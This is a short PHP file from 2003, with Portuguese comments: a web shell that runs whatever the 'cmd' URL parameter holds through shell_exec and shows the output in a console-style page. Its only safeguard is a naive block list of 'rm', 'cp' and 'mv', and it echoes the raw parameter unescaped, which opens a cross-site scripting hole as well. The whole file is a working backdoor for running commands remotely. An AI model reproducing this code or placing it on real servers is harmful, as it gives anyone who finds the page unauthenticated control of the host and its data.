<?
//Francke Peixoto - 26/02/2003
if(isset($_GET['cmd'])) {
$cmd = strtolower($_GET['cmd']);
$cmd_n = array();
$cmd_n[0] = 'rm ';
$cmd_n[1] = 'cp ';
$cmd_n[2] = 'mv ';
for($i = 0; $i < count($cmd_n); $i++){
$p = strpos($cmd,$cmd_n[$i]);
if($p === false){
//echo "COMANDO INVALIDO!"; // nao encontrado nada //
} else {
echo "
<table
cellpadding='0'
cellspacing='0'
height='200'
>
<tr><td bgcolor=#cccccc align=left><b>Erro</b></td><td bgcolor=#cccccc align=right valign=top>
<img src='j.gif'></td></tr>
<tr><td align=center valign=center><img src=r.gif></td><td valign=center
align=center><b><blink>Comando não
permitido!</blink></b></td></tr>
<table>
";
die;
}
}
echo "
<form>
<table cellpadding='0' cellspacing='0'>
<tr><td>
<img src=w.gif>
</td><td valign=bottom> <input type=text name=cmd class=comando> <input type=submit value=comando class=comando>
</td></tr>
</table>
</form>
<div id='Shell'><pre>";
$cmd = shell_exec($cmd);
echo $cmd;
echo gethostbyaddr($_SERVER['REMOTE_ADDR'])."$ ";
echo $_GET['cmd'];
echo "</pre></div>";
}
else
{
echo "<button class='comando' onclick=\"window.location.href='?cmd=pwd';\">INICIAR CONSOLE</button>";
}
?>
<script>
function Scroll()
{
var shell = document.getElementById("Shell");
if(shell)
shell.scrollTop = 1000000;
}
window.onload = function(){ Scroll(); }
</script>